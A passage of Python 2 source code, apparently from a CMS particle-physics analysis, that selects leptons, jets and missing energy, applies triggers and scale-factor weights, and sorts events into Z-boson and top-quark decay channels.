[]\n idx_jet_vbf = []\n\n electrons_tlv_list = []\n loose_electrons_tlv_list = []\n muons_tlv_list = []\n loose_muons_tlv_list = []\n fatjet_tlv_list = []\n jet_tlv_list = []\n jet_tlv_list_vbf = []\n fatjet_tau21_list = []\n fatjet_tau41_list = []\n fatjet_tau42_list = []\n fatjet_tau31_list = []\n fatjet_tau32_list = []\n\n V = ROOT.TLorentzVector()\n H = ROOT.TLorentzVector()\n X = ROOT.TLorentzVector()\n\n V_chs = ROOT.TLorentzVector()\n ######### cuts #########\n elec1_pt_cut = 55.\n elec2_pt_cut = 20.\n elec_pt_cut = 10.\n elec_eta_cut = 2.5\n muon1_pt_cut = 55.\n muon2_pt_cut = 20. \n muon_pt_cut = 10.\n muon_eta_cut = 2.4\n tau_pt_cut = 18.\n tau_eta_cut = 2.3\n ak4_pt_cut = 30.\n ak4_eta_cut = 2.4\n fatjet_pt_cut = 200.\n fatjet_eta_cut = 2.4\n met_pt_cut = 250.\n v_pt_cut = 200.\n tau21_lowercut = 0.35\n tau21_uppercut = 0.75\n j_mass_lowercut = 30.\n j_mass_uppercut = 250.\n v_mass_lowercut = 65.\n v_mass_intercut = 85.\n v_mass_uppercut = 105.\n h_mass_lowercut = 105.\n h_mass_uppercut = 135.\n x_mass_lowercut = 750.\n xt_mass_lowercut = 650.\n xjj_mass_lowercut = 950.\n \n #### flag for year #######\n if self.year == 2016:\n self.is2016 = True\n elif self.year == 2017:\n self.is2017 = True\n elif self.year == 2018:\n self.is2018 = True\n \n \n ######### triggers #########\n if self.year == 2016:\n try:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu50])\n except:\n trigger_SingleMu = event.HLT_Mu50\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n trigger_SingleIsoEle = event.HLT_Ele27_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon175\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight])\n trigger_MET = any([event.HLT_PFMET170_NotCleaned,\n event.HLT_PFMET170_HBHECleaned])\n elif self.year == 2017:\n try:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu100,\n event.HLT_OldMu100])\n except:\n trigger_SingleMu = event.HLT_Mu50\n try:\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n except:\n trigger_SingleEle = None\n trigger_SingleIsoEle = event.HLT_Ele35_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon200\n try:\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,\n event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n except:\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight,\n event.HLT_PFMET130_PFMHT130_IDTight, \n event.HLT_PFMET140_PFMHT140_IDTight,\n event.HLT_PFMETTypeOne110_PFMHT110_IDTight,\n event.HLT_PFMETTypeOne120_PFMHT120_IDTight,\n event.HLT_PFMETTypeOne130_PFMHT130_IDTight,\n event.HLT_PFMETTypeOne140_PFMHT140_IDTight])\n try:\n trigger_MET = any([event.HLT_PFMET200_NotCleaned,\n event.HLT_PFMET200_HBHECleaned,\n event.HLT_PFMET200_HBHE_BeamHaloCleaned,\n event.HLT_PFMET250_HBHECleaned])\n except:\n trigger_MET = None\n\n elif self.year == 2018:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu100,\n event.HLT_OldMu100])\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n trigger_SingleIsoEle = event.HLT_Ele32_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon200\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,\n event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight,\n event.HLT_PFMET130_PFMHT130_IDTight, \n event.HLT_PFMET140_PFMHT140_IDTight,\n event.HLT_PFMETTypeOne110_PFMHT110_IDTight,\n event.HLT_PFMETTypeOne120_PFMHT120_IDTight,\n event.HLT_PFMETTypeOne130_PFMHT130_IDTight,\n event.HLT_PFMETTypeOne140_PFMHT140_IDTight])\n trigger_MET = any([event.HLT_PFMET200_NotCleaned,\n event.HLT_PFMET200_HBHECleaned,\n event.HLT_PFMET200_HBHE_BeamHaloCleaned,\n event.HLT_PFMET250_HBHECleaned])\n ########## Gen Weight #########\n if self.isMC:\n self.GenWeight = -1. if event.genWeight < 0 else 1.\n self.PUWeight = self.puTool.getWeight(event.Pileup_nTrueInt)\n self.EventWeight *= self.GenWeight\n self.EventWeight *= self.PUWeight\n for i,weight in enumerate(event.LHEScaleWeight):\n self.out.LHEScaleWeight_hist.Fill(i,weight)\n for j,weight in enumerate(event.LHEPdfWeight):\n self.out.LHEPdfWeight_hist.Fill(j,weight)\n self.LHEScaleWeight = event.LHEScaleWeight\n self.LHEPdfWeight = event.LHEPdfWeight\n self.LHEWeight_originalXWGTUP = event.LHEWeight_originalXWGTUP\n self.out.events.Fill(0.,self.GenWeight)\n self.out.original.Fill(0.,event.LHEWeight_originalXWGTUP)\n if self.year == 2016 or self.year == 2017:\n self.PrefireWeight = event.PrefireWeight\n self.PrefireWeightUp = event.PrefireWeight_Up\n self.PrefireWeightDown = event.PrefireWeight_Down\n \n if self.isData and event.PV_npvs == 0:\n return False\n if not self.isData:\n self.out.pileup.Fill(event.Pileup_nTrueInt)\n if event.Pileup_nTrueInt == 0:\n return False\n ########### FatJet #########\n for ifatjet in range(event.nFatJet):\n fatjet_pt = event.FatJet_pt[ifatjet]\n fatjet_eta = event.FatJet_eta[ifatjet]\n fatjet_phi = event.FatJet_phi[ifatjet]\n fatjet_mass = event.FatJet_mass[ifatjet]\n fatjet_jetid = event.FatJet_jetId[ifatjet]\n fatjet_tlv = ROOT.TLorentzVector()\n fatjet_tlv.SetPtEtaPhiM(fatjet_pt, fatjet_eta, fatjet_phi, fatjet_mass)\n if fatjet_pt > fatjet_pt_cut and abs(fatjet_eta) < fatjet_eta_cut:\n fatjet_tlv_list.append(fatjet_tlv)\n idx_fatjet.append(ifatjet)\n if event.FatJet_tau1[ifatjet]==0:\n fatjet_tau21_list.append(0)\n fatjet_tau41_list.append(0)\n fatjet_tau31_list.append(0)\n else:\n fatjet_tau21_list.append(event.FatJet_tau2[ifatjet]/event.FatJet_tau1[ifatjet])\n fatjet_tau41_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau1[ifatjet])\n fatjet_tau31_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau1[ifatjet])\n if event.FatJet_tau2[ifatjet]==0:\n fatjet_tau42_list.append(0)\n fatjet_tau32_list.append(0)\n else:\n fatjet_tau42_list.append(event.FatJet_tau4[ifatjet]/event.FatJet_tau2[ifatjet])\n fatjet_tau32_list.append(event.FatJet_tau3[ifatjet]/event.FatJet_tau2[ifatjet])\n self.nFatJets = len(fatjet_tlv_list)\n #stop if no suitable Fatjet\n if len(fatjet_tlv_list) == 0:\n return False \n ########### electrons ##########\n for ielectron in range(event.nElectron):\n electron_pt = event.Electron_pt[ielectron]\n electron_eta = event.Electron_eta[ielectron]\n electron_phi = event.Electron_phi[ielectron]\n electron_mass = event.Electron_mass[ielectron]\n electron_tlv = ROOT.TLorentzVector()\n electron_tlv.SetPtEtaPhiM(electron_pt,electron_eta,electron_phi,electron_mass)\n if electron_eta > -2.5 and electron_eta < -1.479 and electron_phi > -1.55 and electron_phi < -0.9:\n if self.Ele_HEM15_16 == -1.:\n self.Ele_HEM15_16 = 0.\n self.Ele_HEM15_16 += electron_pt\n if electron_pt > elec_pt_cut and abs(electron_eta) < elec_eta_cut:\n idx_electrons.append(ielectron)\n electrons_tlv_list.append(electron_tlv)\n if event.Electron_cutBased[ielectron] >= 2:\n idx_loose_electrons.append(ielectron)\n loose_electrons_tlv_list.append(electron_tlv)\n self.nElectrons = len(loose_electrons_tlv_list)\n \n ########### muons #########\n for imuon in range(event.nMuon):\n muon_pt = event.Muon_pt[imuon]\n muon_eta = event.Muon_eta[imuon]\n muon_phi = event.Muon_phi[imuon]\n muon_mass = event.Muon_mass[imuon]\n muon_tlv = ROOT.TLorentzVector()\n muon_tlv.SetPtEtaPhiM(muon_pt, muon_eta, muon_phi, muon_mass)\n if muon_pt > muon_pt_cut and abs(muon_eta) < muon_eta_cut:\n idx_muons.append(imuon)\n muons_tlv_list.append(muon_tlv)\n if event.Muon_isPFcand[imuon] and struct.unpack('B',event.Muon_pfIsoId[imuon])[0]>=2 and (event.Muon_isGlobal[imuon] or event.Muon_isTracker[imuon]):\n idx_loose_muons.append(imuon)\n loose_muons_tlv_list.append(muon_tlv)\n self.nMuons = len(loose_muons_tlv_list)\n\n\n ############ taus #########\n for itau in range(event.nTau):\n tau_pt = event.Tau_pt[itau]\n tau_eta = event.Tau_eta[itau]\n tau_phi = event.Tau_phi[itau]\n tau_mass = event.Tau_mass[itau]\n tau_tlv = ROOT.TLorentzVector()\n tau_tlv.SetPtEtaPhiM(tau_pt, tau_eta, tau_phi, tau_mass)\n if tau_pt > tau_pt_cut and abs(tau_eta) < tau_eta_cut:\n cleanTau = True\n for loose_electrons_tlv in loose_electrons_tlv_list:\n if loose_electrons_tlv.DeltaR(tau_tlv) < 0.4:\n cleanTau = False\n for loose_muons_tlv in loose_muons_tlv_list:\n if loose_muons_tlv.DeltaR(tau_tlv) < 0.4:\n cleanTau = False\n if cleanTau:\n self.nTaus += 1\n\n ############ MET ##########\n METx = 0.\n METy = 0.\n MET_tlv = ROOT.TLorentzVector()\n MET_tlv.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi, event.PuppiMET_pt)\n \n ############ TTbar pT reweighting ########\n if self.isMC and 'TT' in self.sample[0]:\n Top1_pt, Top2_pt = getTTPt(event)\n self.TopWeight = getTTptWeight(Top1_pt, Top2_pt)\n\n ############ ZtoEE ############\n self.out.eecutflow.Fill(0.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n maxZpt = -1.\n Z_pt = -1.\n Z_m = -1.\n goodelectronpair = False\n for i in idx_electrons:\n for j in idx_electrons:\n if i==j or event.Electron_charge[i] == event.Electron_charge[j]:\n continue\n eli_tlv = ROOT.TLorentzVector()\n eli_tlv.SetPtEtaPhiM(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i],event.Electron_mass[i])\n eli_v = ROOT.TVector3()\n eli_v.SetPtEtaPhi(event.Electron_pt[i],event.Electron_eta[i],event.Electron_phi[i])\n elj_tlv = ROOT.TLorentzVector()\n elj_tlv.SetPtEtaPhiM(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j],event.Electron_mass[j])\n elj_v = ROOT.TVector3()\n elj_v.SetPtEtaPhi(event.Electron_pt[j],event.Electron_eta[j],event.Electron_phi[j])\n diel = eli_tlv + elj_tlv\n Z_pt = diel.Pt()\n Z_m = diel.M()\n if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:\n maxZpt = Z_pt\n if eli_tlv.Pt() > elj_tlv.Pt():\n el1 = i\n el2 = j\n el1_tlv = eli_tlv\n el2_tlv = elj_tlv\n el1_v = eli_v\n el2_v = elj_v\n else:\n el1 = j\n el2 = i\n el1_tlv = elj_tlv\n el2_tlv = eli_tlv\n el1_v = elj_v\n el2_v = eli_v\n goodelectronpair = True\n \n \n if goodelectronpair:\n self.out.eecutflow.Fill(1.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if el1_tlv.Pt() > elec1_pt_cut and el2_tlv.Pt() > elec2_pt_cut:\n self.out.eecutflow.Fill(2.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if event.Electron_cutBased[el1] >= 2 and event.Electron_cutBased[el2] >= 2:\n self.out.eecutflow.Fill(3.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if maxZpt > v_pt_cut:\n self.out.eecutflow.Fill(4.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if trigger_SingleEle == None:\n if not trigger_SingleIsoEle and not trigger_SinglePhoton:\n print \"ZtoEE trigger inconsistency\"\n return False\n else:\n if not trigger_SingleEle and not trigger_SingleIsoEle and not trigger_SinglePhoton:\n print \"ZtoEE trigger inconsistency\"\n return False\n #if not self.isMC and (\"SinglePhoton\" in self.sample[0] and (trigger_SingleEle or trigger_SingleIsoEle)):\n # print \"ZtoEE double counting\"\n # return False\n self.out.eecutflow.Fill(5.,self.EventWeight)\n eecutflow_list.append(self.EventWeight)\n if self.isMC:\n eltrig_tlv = el1_tlv\n #for i in range(event.nTrigObj):\n # if event.TrigObj_id[i] ==11:\n # trigobj_v = ROOT.TVector3()\n # trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])\n # print \"electron TrigObj_filterBits:\",event.TrigObj_filterBits[i]\n # if event.TrigObj_filterBits[i]==14336:\n # #if event.TrigObj_filterBits[i]==1110000000000000:\n # print \"found matching electron\"\n # deltaR1 = trigobj_v.DeltaR(el1_v)\n # deltaR2 = trigobj_v.DeltaR(el2_v)\n # if deltaR2 < deltaR1 and deltaR2 < 0.2:\n # eltrig_tlv = el2_tlv\n # break\n self.TriggerWeight = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.TriggerWeightUp = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) + self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.TriggerWeightDown = self.elSFs.getTriggerSF(eltrig_tlv.Pt(),eltrig_tlv.Eta()) - self.elSFs.getTriggerSFerror(eltrig_tlv.Pt(),eltrig_tlv.Eta())\n self.LeptonWeight = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())*self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())\n IdIsoSF1 = self.elSFs.getIdIsoSF(el1_tlv.Pt(), el1_tlv.Eta())\n IdIsoSF2 = self.elSFs.getIdIsoSF(el2_tlv.Pt(),el2_tlv.Eta())\n IdIsoSF1error = self.elSFs.getIdIsoSFerror(el1_tlv.Pt(), el1_tlv.Eta())\n IdIsoSF2error = self.elSFs.getIdIsoSFerror(el2_tlv.Pt(),el2_tlv.Eta())\n \n self.LeptonWeight = IdIsoSF1*IdIsoSF2\n LeptonWeightsigma = np.sqrt((IdIsoSF1error*IdIsoSF2)**2+(IdIsoSF2error*IdIsoSF1)**2)\n self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma\n self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n V = el1_tlv + el2_tlv\n self.Ele1_pt = el1_tlv.Pt()\n self.Ele1_eta = el1_tlv.Eta()\n self.Ele1_phi = el1_tlv.Phi()\n self.Ele1_mass = el1_tlv.M()\n self.Ele2_pt = el2_tlv.Pt()\n self.Ele2_eta = el2_tlv.Eta()\n self.Ele2_phi = el2_tlv.Phi()\n self.Ele2_mass = el2_tlv.M()\n self.isZtoEE = True\n\n ########## ZtoMM #############\n self.out.mmcutflow.Fill(0.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n maxZpt = -1.\n Z_pt = -1.\n Z_m = -1.\n goodmuonpair = False\n for i in idx_muons:\n for j in idx_muons:\n if i==j or event.Muon_charge[i] == event.Muon_charge[j]:\n continue\n mui_tlv = ROOT.TLorentzVector()\n mui_tlv.SetPtEtaPhiM(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i],event.Muon_mass[i])\n mui_v = ROOT.TVector3()\n mui_v.SetPtEtaPhi(event.Muon_pt[i],event.Muon_eta[i],event.Muon_phi[i])\n muj_tlv = ROOT.TLorentzVector()\n muj_tlv.SetPtEtaPhiM(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j],event.Muon_mass[j]) \n muj_v = ROOT.TVector3()\n muj_v.SetPtEtaPhi(event.Muon_pt[j],event.Muon_eta[j],event.Muon_phi[j])\n dimu = mui_tlv + muj_tlv\n Z_pt = dimu.Pt()\n Z_m = dimu.M()\n if Z_m > 70. and Z_m < 110. and Z_pt > maxZpt:\n maxZpt = Z_pt\n if mui_tlv.Pt() > muj_tlv.Pt():\n mu1 = i\n mu2 = j\n mu1_tlv = mui_tlv\n mu2_tlv = muj_tlv\n mu1_v = mui_v\n mu2_v = muj_v\n else:\n mu1 = j\n mu2 = i\n mu1_tlv = muj_tlv\n mu2_tlv = mui_tlv\n mu1_v = muj_v\n mu2_v = mui_v\n goodmuonpair = True\n \n\n if goodmuonpair:\n self.out.mmcutflow.Fill(1.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]\n mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0] \n if mu1_tlv.Pt() > muon1_pt_cut and mu2_tlv.Pt() > muon2_pt_cut:\n self.out.mmcutflow.Fill(2.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if (mu1_highPtId >= 2 and mu2_highPtId >= 1) or (mu1_highPtId >= 1 and mu2_highPtId >= 2):\n self.out.mmcutflow.Fill(3.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if maxZpt > v_pt_cut:\n self.out.mmcutflow.Fill(4.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if not trigger_SingleMu:\n print \"ZtoMM trigger inconsistency\"\n return False\n self.out.mmcutflow.Fill(5.,self.EventWeight)\n mmcutflow_list.append(self.EventWeight)\n if self.isMC:\n if mu1_highPtId >=2:\n mutrig_tlv = mu1_tlv\n else:\n mutrig_tlv = mu2_tlv\n #for i in range(event.nTrigObj):\n # if event.TrigObj_id[i] ==13:\n # trigobj_v = ROOT.TVector3()\n # trigobj_v.SetPtEtaPhi(event.TrigObj_pt[i],event.TrigObj_eta[i],event.TrigObj_phi[i])\n # deltaR1 = trigobj_v.DeltaR(mu1_v)\n # deltaR2 = trigobj_v.DeltaR(mu2_v)\n # print \"muon TrigObj_filterBits:\",event.TrigObj_filterBits[i]\n # if event.TrigObj_filterBits[i]==2048:\n # #if event.TrigObj_filterBits[i]==10000000000:\n # print \"found matching muon\"\n # if deltaR2 < deltaR1 and deltaR2 < 0.2:\n # mutrig_tlv = mu2_tlv\n # break\n\n self.TriggerWeight = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n self.TriggerWeightUp = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) + self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n self.TriggerWeightDown = self.muSFs.getTriggerSF(mutrig_tlv.Pt(),mutrig_tlv.Eta()) - self.muSFs.getTriggerSFerror(mutrig_tlv.Pt(),mutrig_tlv.Eta())\n IdSF1 = self.muSFs.getIdSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IdSF2 = self.muSFs.getIdSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IsoSF1 = self.muSFs.getIsoSF(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IsoSF2 = self.muSFs.getIsoSF(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IdSF1error = self.muSFs.getIdSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IdSF2error = self.muSFs.getIdSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n IsoSF1error = self.muSFs.getIsoSFerror(mu1_tlv.Pt(),mu1_tlv.Eta(),mu1_highPtId)\n IsoSF2error = self.muSFs.getIsoSFerror(mu2_tlv.Pt(),mu2_tlv.Eta(),mu2_highPtId)\n self.LeptonWeight = IdSF1*IdSF2*IsoSF1*IsoSF2\n LeptonWeightsigma = np.sqrt((IdSF1error*IdSF2*IsoSF1*IsoSF2)**2+(IdSF2error*IdSF1*IsoSF1*IsoSF2)**2+(IsoSF1error*IdSF1*IdSF2*IsoSF2)**2+(IsoSF2error*IdSF1*IdSF2*IsoSF1)**2)\n self.LeptonWeightUp = self.LeptonWeight + LeptonWeightsigma\n self.LeptonWeightDown = self.LeptonWeight - LeptonWeightsigma\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n if mu1_tlv.DeltaR(mu2_tlv) < 0.3:\n try:\n self.Mu1_relIso = ((event.Muon_tkRelIso[mu1]*mu1_tlv.Pt()) - mu2_tlv.Pt())/mu1_tlv.Pt()\n self.Mu2_relIso = ((event.Muon_tkRelIso[mu2]*mu2_tlv.Pt()) - mu1_tlv.Pt())/mu2_tlv.Pt()\n except:\n self.Mu1_relIso = -1.\n self.Mu2_relIso = -1.\n else:\n try:\n self.Mu1_relIso = event.Muon_tkRelIso[mu1]\n self.Mu2_relIso = event.Muon_tkRelIso[mu2]\n except:\n self.Mu1_relIso = -1.\n self.Mu2_relIso = -1.\n V = mu1_tlv + mu2_tlv\n self.Mu1_pt = mu1_tlv.Pt()\n self.Mu1_eta = mu1_tlv.Eta()\n self.Mu1_phi = mu1_tlv.Phi()\n self.Mu1_mass = mu1_tlv.M()\n self.Mu1_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu1])[0]\n self.Mu1_highPtId = struct.unpack('B',event.Muon_highPtId[mu1])[0]\n self.Mu2_pt = mu2_tlv.Pt()\n self.Mu2_eta = mu2_tlv.Eta()\n self.Mu2_phi = mu2_tlv.Phi()\n self.Mu2_mass = mu2_tlv.M()\n self.Mu2_pfIsoId = struct.unpack('B',event.Muon_pfIsoId[mu2])[0]\n self.Mu2_highPtId = struct.unpack('B',event.Muon_highPtId[mu2])[0]\n self.isZtoMM = True\n\n \n ########### TtoEM ######### \n if not self.isZtoMM and not self.isZtoEE and self.nElectrons == 1 and self.nMuons == 1:\n if event.Electron_charge[idx_loose_electrons[0]] != event.Muon_charge[idx_loose_muons[0]]:\n el_tlv = loose_electrons_tlv_list[0]\n mu_tlv = loose_muons_tlv_list[0]\n if mu_tlv.Pt() > 30. and el_tlv.Pt() > 30.: \n V = mu_tlv + el_tlv\n if V.Pt() > 50.:\n if trigger_SingleEle == None:\n if not trigger_SingleIsoEle:\n print \"TtoEM trigger inconsistency\"\n return False\n else:\n if not trigger_SingleEle and not trigger_SingleIsoEle:\n print \"TtoEM trigger inconsistency\"\n return False\n if self.isMC:\n self.TriggerWeight = self.elSFs.getTriggerSF(el_tlv.Pt(),el_tlv.Eta())\n self.LeptonWeight = self.elSFs.getIdIsoSF(el_tlv.Pt(), el_tlv.Eta())\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.EventWeight *= self.TriggerWeight\n self.EventWeight *= self.LeptonWeight\n self.Mu1_pt = mu_tlv.Pt()\n self.Mu1_eta = mu_tlv.Eta()\n self.Mu1_phi = mu_tlv.Phi()\n self.Mu1_mass = mu_tlv.M()\n self.Ele1_pt = el_tlv.Pt()\n self.Ele1_eta = el_tlv.Eta()\n self.Ele1_phi = el_tlv.Phi()\n self.Ele1_mass = el_tlv.M()\n self.isTtoEM = True\n\n ######### ZtoNN ##########\n self.out.nncutflow.Fill(0.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if not self.isZtoMM and not self.isZtoEE and not self.isTtoEM:\n if event.PuppiMET_pt > met_pt_cut :\n self.out.nncutflow.Fill(1.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.nElectrons == 0 and self.nMuons == 0 and self.nTaus == 0:\n self.out.nncutflow.Fill(2.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n V.SetPtEtaPhiE(event.PuppiMET_pt,0.,event.PuppiMET_phi,event.PuppiMET_pt)\n V_chs.SetPtEtaPhiE(event.MET_pt,0.,event.MET_phi,event.MET_pt)\n if trigger_MET == None:\n if not self.isMC and not trigger_METMHT and not trigger_METMHTNoMu:\n print \"ZtoNN Trigger inconsistency\"\n return False\n else:\n if not self.isMC and not trigger_MET and not trigger_METMHT and not trigger_METMHTNoMu:\n print \"ZtoNN Trigger inconsistency\"\n return False\n self.out.nncutflow.Fill(3.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.filter(event) == False:\n print \"Bad event\"\n return False\n self.out.nncutflow.Fill(4.,self.EventWeight)\n nncutflow_list.append(self.EventWeight)\n if self.isMC:\n if 'DYJetsToLL' in self.sample[0] or 'ZJetsToNuNu' in self.sample[0] or 'WJetsToLNu' in self.sample[0]:\n GenVpt = getGenVpt(event)\n self.QCDNLO_Corr = self.DYCorr.getWeightQCDNLO(GenVpt)\n self.QCDNNLO_Corr = self.DYCorr.getWeightQCDNNLO(GenVpt)\n self.EWKNLO_Corr = self.DYCorr.getWeightEWKNLO(GenVpt)\n self.EventWeight *= self.QCDNLO_Corr * self.QCDNNLO_Corr * self.EWKNLO_Corr\n self.TriggerWeight = 1.\n self.isZtoNN = True\n #stop if no semileptonic decays\n if self.isZtoEE==False and self.isZtoMM==False and self.isZtoNN==False and self.isTtoEM==False:\n return False\n ########## setting the Higgs and V index #######\n fatjet_idx_H = 0\n valid_Higgs = False\n if self.isZtoMM:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.DeltaR(mu1_tlv)>0.8 and fatjet_tlv.DeltaR(mu2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:\n fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n valid_Higgs = True\n if not valid_Higgs:\n return False\n\n elif self.isZtoEE:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.DeltaR(el1_tlv)>0.8 and fatjet_tlv.DeltaR(el2_tlv)>0.8 and fatjet_tlv.Pt()>fatjet_maxpt:\n fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n valid_Higgs = True\n if not valid_Higgs:\n return False\n \n elif self.isZtoNN:\n fatjet_maxpt = 0.\n for i,fatjet_tlv in enumerate(fatjet_tlv_list):\n if fatjet_tlv.Pt()>fatjet_maxpt:\n fatjet_maxpt=fatjet_tlv.Pt()\n fatjet_idx_H = i\n\n ############ AK4 Jet ###########\n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n self.HT += jet_pt\n if jet_eta > -2.5 and jet_eta < -1.479 and jet_phi > -1.55 and jet_phi < -0.9:\n if self.HT_HEM15_16 == -1.:\n self.HT_HEM15_16 = 0.\n self.HT_HEM15_16 += jet_pt\n if jet_pt > ak4_pt_cut and abs(jet_eta) < ak4_eta_cut:\n cleanJet = True\n for loose_electrons_tlv in loose_electrons_tlv_list:\n if loose_electrons_tlv.DeltaR(jet_tlv) < 0.4:\n cleanJet 